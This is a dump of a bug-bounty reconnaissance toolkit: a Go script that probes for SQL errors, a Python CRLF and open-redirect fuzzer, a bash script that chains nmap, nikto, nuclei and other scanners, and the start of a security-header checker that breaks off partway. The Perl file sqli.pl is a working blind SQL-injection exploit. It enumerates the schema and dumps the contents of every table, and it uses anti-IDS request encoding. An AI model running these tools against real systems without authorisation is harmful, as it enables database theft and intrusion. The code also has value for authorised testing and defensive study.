"false" { 216 | fmt.Println("[*] Not using tor sockets") 217 | } 218 | if *flagList == "main.txt" { 219 | listed() 220 | os.Exit(1) 221 | } 222 | if *flagTarget == "true" { 223 | fmt.Println("[-] Please input a url") 224 | fmt.Println("[-] go run main.go -t http://testphp.vulnweb.com/listproducts.php?cat=1") 225 | os.Exit(1) 226 | } 227 | injections := []string{ 228 | "baseline", 229 | ")", 230 | "(", 231 | "\"", 232 | "'", 233 | } 234 | errors := []string{ 235 | "SQL", 236 | "MySQL", 237 | "ORA-", 238 | "syntax", 239 | } 240 | 241 | errRegexes := []*regexp.Regexp{} 242 | for _, e := range errors { 243 | re := regexp.MustCompile(fmt.Sprintf(".*%s.*", e)) 244 | errRegexes = append(errRegexes, re) 245 | } 246 | 247 | for _, payload := range injections { 248 | client := new(http.Client) 249 | body := []byte(fmt.Sprintf("username=%s&password=p", payload)) 250 | 251 | res, err := http.NewRequest( 252 | "POST", 253 | *flagTarget, 254 | bytes.NewReader(body), 255 | ) 256 | 257 | if err != nil { 258 | log.Fatalf("\033[31m\t[X] Unable to Create request -> %s\n", err) 259 | } 260 | 261 | res.Header.Add("Content-Type", "application/x-www-form-urlencoded") 262 | resp, err := client.Do(res) 263 | if err != nil { 264 | log.Fatalf("\033[31m[X] Unable to process response: %s\n", err) 265 | } 266 | 267 | body, err = ioutil.ReadAll(resp.Body) 268 | if err != nil { 269 | log.Fatalf("\033[31m[X] Unable to read response body: %s\n", err) 270 | } 271 | 272 | resp.Body.Close() // close response 273 | 274 | for idx, re := range errRegexes { 275 | if re.MatchString(string(body)) { 276 | stringerror := "Server is vulnerable" 277 | errormsg := "An error | detected vulnerability" 278 | // fmt.Printf("[+] SQL Error found [Server->%s] for payload: %s\n", errors[idx], payload) 279 | row_1 := []interface{}{errors[idx], payload} 280 | row_2 := []interface{}{errormsg} 281 | t := gotabulate.Create([][]interface{}{row_1, row_2}) 282 | t.SetHeaders([]string{*flagTarget, stringerror}) 283 | t.SetAlign("center") 284 | fmt.Println("\033[37m", t.Render("grid")) 285 | break 286 | } 287 | } 288 | } 289 | } 290 | -------------------------------------------------------------------------------- /tools/Injectus.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3.7 2 | 3 | import argparse 4 | import asyncio 5 | import logging 6 | import re 7 | import sys 8 | import signal 9 | import time 10 | 11 | from multiprocessing import Pool, Process, JoinableQueue 12 | from urllib.parse import urlsplit, urlunsplit, unquote 13 | from pathlib import Path 14 | 15 | from utils import build_crlf_list, build_openredirect_list 16 | 17 | import aiohttp 18 | import aiofiles 19 | 20 | class bcolors: 21 | HEADER = "\033[95m" 22 | OKBLUE = "\033[94m" 23 | OKGREEN = "\033[92m" 24 | RED = "\033[31m" 25 | WARNING = "\033[93m" 26 | FAIL = "\033[91m" 27 | ENDC = "\033[0m" 28 | BOLD = "\033[1m" 29 | UNDERLINE = "\033[4m" 30 | 31 | banner = f''' 32 | {bcolors.OKGREEN} 33 | ▪ ▐ ▄ ▐▄▄▄▄▄▄ . ▄▄· ▄▄▄▄▄▄• ▄▌.▄▄ · 34 | ██ •█▌▐█ ·██▀▄.▀·▐█ ▌▪•██ █▪██▌▐█ ▀. 
35 | ▐█·▐█▐▐▌▪▄ ██▐▀▀▪▄██ ▄▄ ▐█.▪█▌▐█▌▄▀▀▀█▄ 36 | ▐█▌██▐█▌▐▌▐█▌▐█▄▄▌▐███▌ ▐█▌·▐█▄█▌▐█▄▪▐█ 37 | ▀▀▀▀▀ █▪ ▀▀▀• ▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀ ▀▀▀▀ {bcolors.ENDC} 38 | {bcolors.UNDERLINE}{bcolors.FAIL}~ BOUNTYSTRIKE ~{bcolors.ENDC} 39 | ''' 40 | 41 | 42 | class SigHandler: 43 | def __init__(self, async_queue): 44 | self.queue = async_queue 45 | def __call__(self, signo, frame): 46 | print("\n[-] CTRL-C Detected, attempting graceful shutdown...") 47 | print("[-] Notifying workers to shutdown...") 48 | 49 | self.queue._queue.clear() 50 | self.queue._finished.set() 51 | self.queue._unfinished_tasks = 0 52 | 53 | async def worker(name: str, queue, session, delay): 54 | while True: 55 | try: 56 | url_dict = await queue.get() 57 | except asyncio.QueueEmpty: 58 | break 59 | 60 | if url_dict is None: 61 | break 62 | 63 | u = url_dict 64 | 65 | try: 66 | async with session.get(u.get("url"), allow_redirects=False) as resp: 67 | 68 | if u.get("type") == "crlf": 69 | if "bounty" in resp.headers.keys(): 70 | print(f"{bcolors.OKGREEN}[{name}] CRLF Injection detected: {u.get('url')}{bcolors.ENDC}") 71 | else: 72 | print(f'[{name}] injecting crlf payloads {u.get("url")} {bcolors.FAIL}[FAILED]{bcolors.ENDC}') 73 | 74 | if u.get("type") == "openredirect": 75 | # This comparison is un ugly hack because aiohttp only support scheme to be 76 | # either https|http|''. Need to set redirect=False because of this. 77 | if "Location" in resp.headers.keys() and resp.headers["Location"].startswith(unquote(u["payload"])): 78 | print(f"{bcolors.OKGREEN}[{name}] Open redirect detected: {u.get('url')}{bcolors.ENDC}") 79 | else: 80 | print(f'[{name}] injecting open redirect payloads {u.get("url")} {bcolors.FAIL}[FAILED]{bcolors.ENDC}') 81 | 82 | await asyncio.sleep(delay) 83 | 84 | except asyncio.TimeoutError: 85 | print(f"{bcolors.WARNING}[ERROR][{name}] timed out when attacking {u.get('url')}...{bcolors.ENDC}") 86 | queue.task_done() 87 | continue 88 | except Exception as e: 89 | print(f"[ERROR] Something went wrong: {e}") 90 | queue.task_done() 91 | break 92 | 93 | queue.task_done() 94 | 95 | 96 | async def start(args): 97 | started_at = time.time() 98 | filename = args.file 99 | workers = args.workers 100 | url = args.url 101 | async_queue = asyncio.Queue() 102 | delay = args.delay 103 | 104 | signal.signal(signal.SIGINT, SigHandler(async_queue)) 105 | 106 | if url: 107 | if args.crlf: 108 | for payload in build_crlf_list(url): 109 | if args.no_request: 110 | print(payload) 111 | else: 112 | await async_queue.put(payload) 113 | 114 | if args.openredirect: 115 | for payload in build_openredirect_list(url): 116 | if args.no_request: 117 | print(payload) 118 | else: 119 | await async_queue.put(payload) 120 | else: 121 | async with aiofiles.open(f"{filename}", "r") as f: 122 | async for domain in f: 123 | domain = domain.replace("\n", "") 124 | 125 | if args.crlf: 126 | for inject in build_crlf_list(domain): 127 | if args.no_request: 128 | print(f"[{inject['type']}] {inject['url']}") 129 | else: 130 | await async_queue.put(inject) 131 | 132 | if args.openredirect: 133 | for inject in build_openredirect_list(domain): 134 | if args.no_request: 135 | print(f"[{inject['type']}] {inject['url']}") 136 | else: 137 | await async_queue.put(inject) 138 | 139 | if not args.no_request: 140 | # Create workers 141 | tasks = [] 142 | size = async_queue.qsize() 143 | connector = aiohttp.TCPConnector( 144 | ssl=False, 145 | limit=50, 146 | ) 147 | session = aiohttp.ClientSession(connector=connector,timeout=aiohttp.ClientTimeout(total=args.timeout)) 148 | 
for i in range(workers): 149 | task = asyncio.create_task(worker(f'worker-{i}', async_queue, session, delay)) 150 | tasks.append(task) 151 | 152 | # Wait until the queue is fully processed. 153 | await async_queue.join() 154 | 155 | # Cancel our worker tasks. 156 | for task in tasks: 157 | task.cancel() 158 | await session.close() 159 | # Wait until all worker tasks are cancelled. 160 | await asyncio.gather(*tasks, return_exceptions=True) 161 | time_ended = time.time() - started_at 162 | 163 | print('=====================================') 164 | print(f"[+] Processing time: {time_ended} seconds") 165 | print(f"[+] Total URLs {size}") 166 | 167 | 168 | def main(): 169 | parser = argparse.ArgumentParser(prog="Injectus", description="CRLF and open redirect fuzzer. Crafted by @dubs3c.") 170 | parser.add_argument("-f", "--file", action="store", dest="file", help="File containing URLs") 171 | parser.add_argument("-u", "--url", action="store", dest="url", help="Single URL to test") 172 | parser.add_argument("-r", "--no-request", action="store_true", dest="no_request", help="Only build attack list, do not perform any requests") 173 | parser.add_argument("-w", "--workers", type=int, default=10, dest="workers", action="store", help="Amount of asyncio workers, default is 10") 174 | parser.add_argument("-t", "--timeout", type=int, default=6, dest="timeout", action="store", help="HTTP request timeout, default is 6 seconds") 175 | parser.add_argument("-d", "--delay", type=int, default=1, dest="delay", action="store", help="The delay between requests, default is 1 second") 176 | parser.add_argument("-c", "--crlf", action="store_true", dest="crlf", help="Only perform crlf attacks") 177 | parser.add_argument("-op", "--openredirect", action="store_true", dest="openredirect", help="Only perform open redirect attacks") 178 | args = parser.parse_args() 179 | 180 | if len(sys.argv) == 1: 181 | print(banner) 182 | parser.print_help() 183 | quit() 184 | 185 | if not args.url and not Path.exists(Path(args.file).resolve()): 186 | print(f"{args.file} does not exist") 187 | quit() 188 | 189 | if args.url and args.file: 190 | print("Can't specify both -u and -f, choose one!") 191 | quit() 192 | 193 | if args.crlf and not args.openredirect: 194 | args.openredirect = False 195 | 196 | if args.openredirect and not args.crlf: 197 | args.crlf = False 198 | 199 | if not args.openredirect and not args.crlf: 200 | args.crlf = True 201 | args.openredirect = True 202 | 203 | 204 | asyncio.run(start(args)) 205 | 206 | if __name__ == "__main__": 207 | main() -------------------------------------------------------------------------------- /tools/sqli.pl: -------------------------------------------------------------------------------- 1 | use strict; 2 | use Getopt::Std; 3 | use Digest::MD5 qw(md5_hex); 4 | use LW2; 5 | 6 | my %options = (); 7 | getopts("u:h:q:", \%options); 8 | 9 | my $url = $options{u}; # Vuln URL 10 | my $host = $options{h}; # Needs this for libwhisker 11 | 12 | 13 | # Format. 14 | my $count = 0; 15 | 16 | 17 | if ( $url eq "" ) { 18 | print "\n[!] need a url or hostname preferably both [!]\n"; 19 | print "\n[+] Try maybe- IDK fucking perl sqli.pl -u -h fucking cunt LOL "; 20 | print "\n[+] perl sqli.pl -u http://testphp.vulnweb.com/ -h 18.192.172.30"; 21 | print "\n[!] 
Aboring......\n"; 22 | exit(1); 23 | } 24 | 25 | if (my $q = $options{q}) { 26 | $q =~ s/\ /%20/g; 27 | my ($cxr, $result) = runQuery($url,$host,$q); 28 | print "Query Result:\n\t$result\nCalculated in $cxr requests.\n"; 29 | exit(1); 30 | } 31 | 32 | # Get the Database Version 33 | my $query = "SELECT%20VERSION()"; 34 | my ($tmp, $version) = runQuery($url, $host, $query); 35 | $count += $tmp; 36 | $count += 2; 37 | print "\nDatabase Version:\t\t$version\nIn $count requests.\n\n"; 38 | 39 | # Get the Database Name 40 | $query = "SELECT%20DATABASE()"; 41 | my ($tmp,$answer) = runQuery($url, $host, $query); 42 | print "Database Name:\t\t$answer\nIn $tmp requests.\n\n"; 43 | 44 | # Get the Database Username 45 | $query = "SELECT%20USER()"; 46 | my ($tmp,$answer) = runQuery($url, $host, $query); 47 | print "Database User:\t\t$answer\nIn $tmp requests.\n\n"; 48 | 49 | 50 | if ($version =~ /5\./g) 51 | { 52 | print "Enumerating Database Spec:\n"; 53 | getSchema($url,$host); 54 | exit(1); 55 | } else { 56 | print "This is not MySQL v5.x, so I can't enumerate the schema tables!\n"; 57 | exit(1); 58 | } 59 | 60 | sub getSchema 61 | { 62 | my $url = shift; 63 | my $host = shift; 64 | my $query = "SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE())"; 65 | $query =~ s/ /%20/g; 66 | 67 | my ($c, $val) = runQuery($url,$host,$query); 68 | for (my $i=0; $i < int($val); ++$i) 69 | { 70 | $query = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE()) LIMIT $i,1"; 71 | $query =~ s/ /%20/g; 72 | 73 | my ($q, $table) = runQuery($url,$host,$query); 74 | print "$table:\n";#table name 75 | $query = "SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="; 76 | $query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="; 77 | $query .= "(SELECT DATABASE()) LIMIT $i,1)"; 78 | $query =~ s/ /%20/g; 79 | 80 | my ($r, $fcount) = runQuery($url,$host,$query); 81 | # $fcount - number of columns in the table 82 | for (my $n = 0; $n < int($fcount); ++$n) 83 | { 84 | $query = "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="; 85 | $query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="; 86 | $query .= "(SELECT DATABASE()) LIMIT $i,1) LIMIT $n,1"; 87 | $query =~ s/ /%20/g; 88 | my ($o, $field) = runQuery($url,$host,$query); 89 | print "\t$field\n"; 90 | # scrape main database. 91 | $query = "SELECT COUNT($field) FROM $table"; 92 | $query =~ s/ /%20/g; 93 | my ($r, $total) = runQuery($url,$host,$query); 94 | for (my $cn = 0; $cn < $total; $cn++) 95 | { 96 | $query = "SELECT $field FROM $table LIMIT $cn,1"; 97 | $query =~ s/ /%20/g; 98 | my ($e, $data) = runQuery($url,$host,$query); 99 | print "\t\t$data\n"; 100 | } 101 | } 102 | } 103 | } 104 | 105 | sub runQuery 106 | { 107 | my $url = shift; 108 | my $host = shift; 109 | my $query = shift; 110 | 111 | my $qCount; 112 | my $qCH; 113 | 114 | my $pos = 1; 115 | my $floor = 0; # Bottom of ascii keyrange 116 | my $ceiling = 255; # Top of ascii keyrange 117 | 118 | my $spacer = "%20OR%20"; 119 | my $truth = "62=62/*"; 120 | my $lie = "88=98/*"; 121 | 122 | my ($true, $false) = makeTrueFalse($url, $spacer, $truth, $lie, $host); 123 | my $lenUri = "$url" . queryConstruct(0, 0, $spacer, $query); 124 | my ($qCH, $len) = getValue($lenUri, 64, 0, $true, $false, $host); 125 | $qCount += $qCH; 126 | my $results = ""; 127 | while (($pos < $len) || ($pos eq $len)) 128 | { 129 | my $uri = "$url" . 
queryConstruct(1, $pos, $spacer, $query); #construct the actual URI 130 | my ($qCH, $value) = getValue($uri, $ceiling, $floor, $true, $false, $host); 131 | $qCount += $qCH; 132 | my $char = chr("$value"); 133 | $results .= $char; 134 | ++$pos; 135 | } 136 | return ($qCount, $results); 137 | } 138 | 139 | #Logrithm 140 | sub getValue 141 | { 142 | my $uri = shift; 143 | my $ceiling = shift; 144 | my $floor = shift; 145 | my $true = shift; 146 | my $false = shift; 147 | my $host = shift; 148 | 149 | my $nextmaybe; 150 | my $target; 151 | my $qCount = 0; 152 | 153 | my $maybe = int($ceiling/2); 154 | 155 | while (not defined $target) { 156 | if (isGT($uri, $maybe, $host) eq $true) 157 | { 158 | ++$qCount; 159 | $floor = $maybe; 160 | $nextmaybe = int($maybe + (($ceiling - $floor)/2)); 161 | } elsif (isLT($uri, $maybe, $host) eq $true) 162 | { 163 | ++$qCount; 164 | $ceiling = $maybe; 165 | $nextmaybe = int($maybe - (($ceiling - $floor)/2)); 166 | } elsif (isEQ($uri, $maybe, $host) eq $true) 167 | { 168 | ++$qCount; 169 | $target = $maybe; 170 | return ($qCount, $target); 171 | } 172 | $maybe = $nextmaybe; 173 | if (($maybe eq "") || (!$maybe) || (not defined $maybe)) 174 | { 175 | print "[-] SQL Error caught! Aborting!\n"; 176 | print "[-] At least 3 queries in error log!\n"; 177 | print "[-] SQL SERVER MAYBE TO HIGH OR TOO LOW LEVEL\n"; 178 | exit(1); 179 | } 180 | } 181 | } 182 | 183 | # Is greater than? 184 | sub isGT 185 | { 186 | my $uri = shift; 187 | my $guess = shift; 188 | my $host = shift; 189 | return (md5_hex(download("$uri>$guess)/*", $host))); 190 | } 191 | 192 | # Is less than? 193 | sub isLT 194 | { 195 | my $uri = shift; 196 | my $guess = shift; 197 | my $host = shift; 198 | return (md5_hex(download("$uri<$guess)/*", $host))); 199 | } 200 | 201 | sub isEQ 202 | { 203 | my $uri = shift; 204 | my $guess = shift; 205 | my $host = shift; 206 | return (md5_hex(download("$uri=$guess)/*", $host))); 207 | } 208 | 209 | # Ripped off from an older version of the scanner 210 | sub download 211 | { 212 | my $uri = shift; 213 | my $try = 5; 214 | my $host = shift; 215 | my %request; 216 | my %response; 217 | LW2::http_init_request(\%request); 218 | $request{'whisker'}->{'method'} = "GET"; 219 | $request{'whisker'}->{'host'} = $host; 220 | $request{'whisker'}->{'uri'} = $uri; 221 | $request{'whisker'}->{'encode_anti_ids'} = 962; 222 | $request{'whisker'}->{'user-agent'} = "wget"; 223 | LW2::http_fixup_request(\%request); 224 | if(LW2::http_do_request(\%request, \%response)) { 225 | if($try < 5) { 226 | print "Failed to fetch $uri on try $try. 
Retrying...\n"; 227 | return undef if(!download($uri, $try++)); 228 | } 229 | print "Failed to fetch $uri.\n"; 230 | return undef; 231 | } else { 232 | return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'}); 233 | } 234 | } 235 | 236 | sub queryConstruct 237 | { 238 | my $type = shift; 239 | my $pos = shift; 240 | my $spacer = shift; 241 | my $query = shift; 242 | 243 | if ($type eq 0) # Len 244 | { 245 | my $newQuery = "LENGTH(($query))"; 246 | my $padding = "("; 247 | my $ender = ""; 248 | return ("$spacer$padding$newQuery$ender"); 249 | } elsif ($type eq 1) # String 250 | { 251 | my $padding = "((ASCII((LOWER((MID(("; #query construction 252 | my $ender = "),$pos,1))))))"; # End query Construct 253 | return ("$spacer$padding$query$ender"); #construct the actual query 254 | } 255 | } 256 | 257 | sub makeTrueFalse 258 | { 259 | my $url = shift; 260 | my $spacer = shift; 261 | my $truth = shift; 262 | my $lie = shift; 263 | my $host = shift; 264 | my $trueMD = md5_hex(download("$url$spacer$truth", $host)); 265 | my $falsMD = md5_hex(download("$url$spacer$lie", $host)); 266 | 267 | # returns true, false 268 | return ($trueMD, $falsMD); 269 | } 270 | 271 | -------------------------------------------------------------------------------- /parrot-recon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # WARNING! This tool is incredibly invasive and will make a lot of noise on a network it 4 | # is designed for bug bounties not pentests involving a blue team. please be careful when 5 | # using this tool. Also DISCLAIMER: I WILL NOT BE HELD RESPONSIBLE FOR ANY ILLEGAL ACTIVITY 6 | # YOU DECIDE TO DO WITH THIS TOOL. IT WAS MADE FOR ETHICAL PURPOSES. PLEASE BE CARFUL!!! 7 | 8 | # banner 9 | cat << "EOF" 10 | ___ __ ___ 11 | / _ \___ ____________ / /____ / _ \___ _______ ___ 12 | / ___/ _ `/ __/ __/ _ \/ __(_-< / , _/ -_) __/ _ \/ _ \ 13 | /_/ \_,_/_/ /_/ \___/\__/___/ /_/|_|\__/\__/\___/_//_/ 14 | 15 | /.\ 16 | | \ 17 | / \ 18 | // / 19 | |/ /\__________________________________________________ 20 | / / 21 | / / 22 | \/ 23 | EOF 24 | 25 | # defines enviornment variables and terminal colors 26 | red=`tput setaf 1` 27 | white=`tput setaf 7` 28 | green=`tput setaf 2` 29 | blue=`tput setaf 4` 30 | working_dir=$(cd -P -- "$(dirname -- "$0")" && pwd -P) 31 | results_dir=$working_dir/results 32 | tools_dir=$working_dir/tools 33 | format_newline='printf \n' 34 | 35 | 36 | # argument parsing to decide what scan should be ran 37 | format_newline() { 38 | printf "\n" 39 | } 40 | 41 | # Usage function 42 | usage() { 43 | format_newline 44 | echo "${green}Usage:${white} $0 -d -t -w -c " 45 | format_newline 46 | echo "Scan Types:" 47 | echo "${red}API${white} - Enumerates an API and finds common misconfigurations" 48 | echo "${red}WEB${white} - Enumerates a Web Application and runs a vulnerability scan" 49 | echo "${red}ALL${white} - Performs both API and Web enumeration" 50 | exit 0 51 | } 52 | 53 | api_scan(){ 54 | echo "[!] Starting API Scanning" 55 | 56 | echo "[+] Extracting API URLs from Collection File: $api_collection" 57 | 58 | case "$api_collection" in 59 | *.json) 60 | echo "[*] JSON file detected. Extracting URLs using grep on $api_collection" 61 | cat "$api_collection" | grep -oP '"raw":\s*"\Khttps?://[^"]+' > api_urls.txt 62 | ;; 63 | *.yaml|*.yml) 64 | echo "[*] YAML file detected. 
Extracting URLs using grep on $api_collection" 65 | cat $api_collection | grep 'url' | cut -d ':' -f3 | tr -d ' ' | tr -d '"' | cut -d '/' -f3 | sed 's/^/https:\/\//' > api_urls.txt 66 | ;; 67 | *) 68 | echo "[!] Error: Unsupported file format. Please provide a .json or .yaml/.yml file." 69 | ;; 70 | esac 71 | 72 | 73 | echo "$blue[+] URLs extracted and saved to api_urls.txt$white" 74 | 75 | url=$(cat api_urls.txt) 76 | 77 | # url without https:// 78 | url_no_https=$(echo $url | sed 's/https:\/\///') 79 | 80 | echo "$red[+] Starting Nmap Script Vuln Enumeration on Endpoint$white" 81 | nmap -sV -sC -p 443 --script=vuln -oA $results_dir/nmap-api-vuln-scan $url_no_https 82 | echo "$green[+] Nmap Script Vuln Enumeration Saved To: $results_dir/nmap-api-vuln-scan" 83 | 84 | echo "$red[+] Starting Nitko Scan for API$white" 85 | nikto -h $url -o $results_dir/nikto-api-scan.txt 86 | echo "$green[+] Nikto Scan Saved To: $results_dir/nikto-api-scan.txt" 87 | 88 | echo "$red[+] Checking for Authentication Bypass$white" 89 | # Get the HTTP response code using cURL 90 | response=$(curl -s -o /dev/null -w "%{http_code}" "$url") 91 | # Output the URL and response code 92 | echo "----------------- Results -------------------" 93 | echo "$url - $response" 94 | # Check if the response code is 200 95 | if [ "$response" -eq 200 ]; then 96 | echo "$red[-] Authentication bypass may be possible $white" 97 | else 98 | echo "$green[+] Authentication bypass may not not possible $white" 99 | fi 100 | 101 | exit 0 102 | } 103 | 104 | 105 | scan_all(){ 106 | api_scan 107 | web_scan 108 | } 109 | 110 | web_scan(){ 111 | # enumerating websites domain using the tools from install script 112 | echo "$blue[+] Starting Website Enumeration" 113 | go run $tools_dir/main.go -t http://$domain || go run $tools_dir/main.go -t https://$domain 114 | echo "$red[+] Starting URL DORK Scan$white" 115 | bash $tools_dir/dork.sh $domain > $results_dir/$domain-dork.txt 116 | echo "$green[+] URL DORK Scan Saved To: $results_dir/$domain-dork.txt" 117 | 118 | echo "$red[+] Starting Nmap TCP Scan$white" 119 | nmap -sV -sC $domain -oA $results_dir/$domain-tcp-scan --open 120 | echo "$green[+] Nmap TCP Scan Saved To: $results_dir/$domain-tcp-scan" 121 | 122 | # echo "$red[+] Starting Nmap UDP Scan$white" 123 | # nmap -sV -sU $domain -oA $results_dir/$domain-udp-scan --open 124 | # echo "$green[+] Nmap UDP Scan Saved To: $results_dir/$domain-udp-scan" 125 | 126 | echo "$red[+] Starting IDS/IPS Detection $white" 127 | wafw00f https://$domain -o $results_dir/wafw00f-$domain.txt || wafw00f http://$domain -o $results_dir/wafw00f-$domain.txt 128 | echo "$green[+] IPS/IPS Results Saved To: $results_dir/wafw00f-$domain.txt" 129 | 130 | echo "$red[+] Starting Subdomain Enumeration$white" 131 | sublist3r -d $domain -o $results_dir/subdomains-$domain.txt 132 | echo "$green[+] Subdomains Saved To: $results_dir/subdomains-$domain.txt" 133 | 134 | echo "$red[+] Starting Nikto Scan$white" 135 | nikto -h $domain -o $results_dir/nikto-$domain.txt 136 | echo "$green[+] Nikto Scan Saved To: $results_dir/nikto-$domain.txt" 137 | 138 | echo "$red[+] Starting CMS Enumeration$white" 139 | cmsmap -F https://$domain -o $results_dir/cmsenum-$domain.txt || cmsmap -F http://$domain -o $results_dir/cmsenum-$domain.txt 140 | echo "$green[+] CMS Enumeration Saved To: $results_dir/cmsenum-$domain.txt" 141 | 142 | echo "$red[+] Starting SSL Scans$white" 143 | sslyze --regular $domain > $results_dir/$domain-sslyze-regular.txt 144 | echo "$green[+] Regular SSL Scan Saved To: 
$results_dir/$domain-sslyze-regular.txt" 145 | sslyze --heartbleed $domain > $results_dir/$domain-sslyze-heartbleed.txt 146 | echo "$green[+] HeartBleed Scan Saved To: $results_dir/$domain-sslyze-heartbleed.txt" 147 | sslyze --robot $domain > $results_dir/$domain-sslyze-robot.txt 148 | echo "$green[+] Robot Scan Saved To: $results_dir/$domain-sslyze-robot.txt" 149 | 150 | echo "$red[+] Starting Nuclei Scans$white" 151 | nuclei -u $domain -o $results_dir/nuclei-$domain.txt 152 | echo "$green[+] Neclei Scans Saved To: $results_dir/nuclei-$domain.txt" 153 | 154 | 155 | echo "$red[+] Starting Secure Headers Check$white" 156 | python3 $tools_dir/shcheck.py https://$domain > $results_dir/$domain-shcheck.txt || python3 $tools_dir/shcheck.py http://$domain > $results_dir/$domain-shcheck.txt 157 | echo "$green[+] Shcheck Results Saved To: $results_dir/$domain-shcheck.txt" 158 | 159 | echo "$red[+] Starting CORS Enumeration$white" 160 | python3 $tools_dir/cors_scanner.py -u https://$domain -csv $results_dir/$domain-cors.csv || python3 $tools_dir/cors_scanner.py -u http://$domain -csv $results_dir/$domain-cors.csv 161 | echo "$green[+] CORS Enumaration Results Saved To: $results_dir/$domain-cors.csv" 162 | 163 | echo "$red[+] Starting HTTP HEADER INJECTION Enumeration$white" 164 | $tools_dir/headi -u https://$domain/ > $results_dir/headi-$domain.txt || headi -u http://$domain/ > $results_dir/headi-$domain.txt 165 | echo "$green[+] HTTP HEADER INJECTION Results Saved To: $results_dir/headi-$domain.txt" 166 | } 167 | 168 | 169 | # Parse command-line options 170 | while getopts ":d:t:w:h:c:" opt; do 171 | case ${opt} in 172 | d ) 173 | domain=${OPTARG} 174 | ;; 175 | t ) 176 | type=${OPTARG} 177 | ;; 178 | w ) 179 | wordlist=${OPTARG} 180 | ;; 181 | h ) 182 | usage 183 | ;; 184 | c ) 185 | api_collection=${OPTARG} 186 | ;; 187 | \? ) 188 | echo "${red}Invalid option: -${OPTARG}${reset}" >&2 189 | usage 190 | ;; 191 | : ) 192 | echo "${red}Option -${OPTARG} requires an argument.${reset}" >&2 193 | usage 194 | ;; 195 | esac 196 | done 197 | 198 | # Validate required arguments 199 | if [ -z "$domain" ] || [ -z "$type" ]; then 200 | echo "${red}Domain and type are required.${reset}" 201 | usage 202 | fi 203 | 204 | # Check for root privileges 205 | if [ "$(id -u)" -ne 0 ]; then 206 | echo "${red}[!] 
This script must be run as root.${reset}" 207 | exit 1 208 | fi 209 | 210 | # Environment setup 211 | format_newline 212 | echo "[+] Setting Up Environment" 213 | mkdir -p "$results_dir" 214 | 215 | # Output domain information 216 | format_newline 217 | echo "[*] Domain Name: $domain" 218 | ip_address=$(host $domain | awk '/has address/ { print $4 ; exit }') 219 | echo "[*] IP Address: $ip_address" 220 | 221 | # Scan configuration 222 | scan_config() { 223 | case $type in 224 | "API" ) 225 | echo "${green}[+] Running an API scan on $domain${reset}" 226 | api_scan 227 | ;; 228 | "WEB" ) 229 | echo "${green}[+] Running a WEB scan on $domain${reset}" 230 | web_scan 231 | ;; 232 | "ALL" ) 233 | echo "${green}[+] Running both API and WEB scans on $domain${reset}" 234 | ;; 235 | * ) 236 | echo "${red}Unknown scan type: $type${reset}" 237 | usage 238 | ;; 239 | esac 240 | } 241 | 242 | scan_config 243 | 244 | 245 | #echo "$red[+] Sending Completion Email " 246 | #python3 mailserver/sendemail.py 247 | 248 | #echo "$red[+] Opening Web Server" 249 | #python3 webdav/webserver.py 250 | 251 | echo "$red[+] Script Done!$white" 252 | echo "$red[+] Check Your WebDAV For The Results!$white" 253 | -------------------------------------------------------------------------------- /tools/shcheck.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # shcheck - Security headers check! 4 | # Copyright (C) 2019-2021 santoru 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | 19 | 20 | import urllib.request 21 | import urllib.error 22 | import urllib.parse 23 | import http.client 24 | import socket 25 | import sys 26 | import ssl 27 | import os 28 | import json 29 | from optparse import OptionParser 30 | 31 | 32 | class darkcolours: 33 | HEADER = '\033[95m' 34 | OKBLUE = '\033[94m' 35 | OKGREEN = '\033[92m' 36 | WARNING = '\033[93m' 37 | FAIL = '\033[91m' 38 | ENDC = '\033[0m' 39 | BOLD = '\033[1m' 40 | UNDERLINE = '\033[4m' 41 | 42 | 43 | class lightcolours: 44 | HEADER = '\033[95m' 45 | OKBLUE = '\033[94m' 46 | OKGREEN = '\033[92m' 47 | WARNING = '\033[95m' 48 | FAIL = '\033[91m' 49 | ENDC = '\033[0m' 50 | BOLD = '\033[1m' 51 | UNDERLINE = '\033[4m' 52 | 53 | 54 | # log - prints unless JSON output is set 55 | def log(string): 56 | if options.json_output: 57 | return 58 | print(string) 59 | 60 | 61 | # Client headers to send to the server during the request. 
62 | client_headers = { 63 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0)\ 64 | Gecko/20100101 Firefox/53.0', 65 | 'Accept': 'text/html,application/xhtml+xml,\ 66 | application/xml;q=0.9,*/*;q=0.8', 67 | 'Accept-Language': 'en-US;q=0.8,en;q=0.3', 68 | 'Upgrade-Insecure-Requests': 1 69 | } 70 | 71 | 72 | # Security headers that should be enabled 73 | sec_headers = { 74 | 'X-XSS-Protection': 'deprecated', 75 | 'X-Frame-Options': 'warning', 76 | 'X-Content-Type-Options': 'warning', 77 | 'Strict-Transport-Security': 'error', 78 | 'Content-Security-Policy': 'warning', 79 | 'X-Permitted-Cross-Domain-Policies': 'deprecated', 80 | 'Referrer-Policy': 'warning', 81 | 'Expect-CT': 'deprecated', 82 | 'Permissions-Policy': 'warning', 83 | 'Cross-Origin-Embedder-Policy': 'warning', 84 | 'Cross-Origin-Resource-Policy': 'warning', 85 | 'Cross-Origin-Opener-Policy': 'warning' 86 | } 87 | 88 | information_headers = { 89 | 'X-Powered-By', 90 | 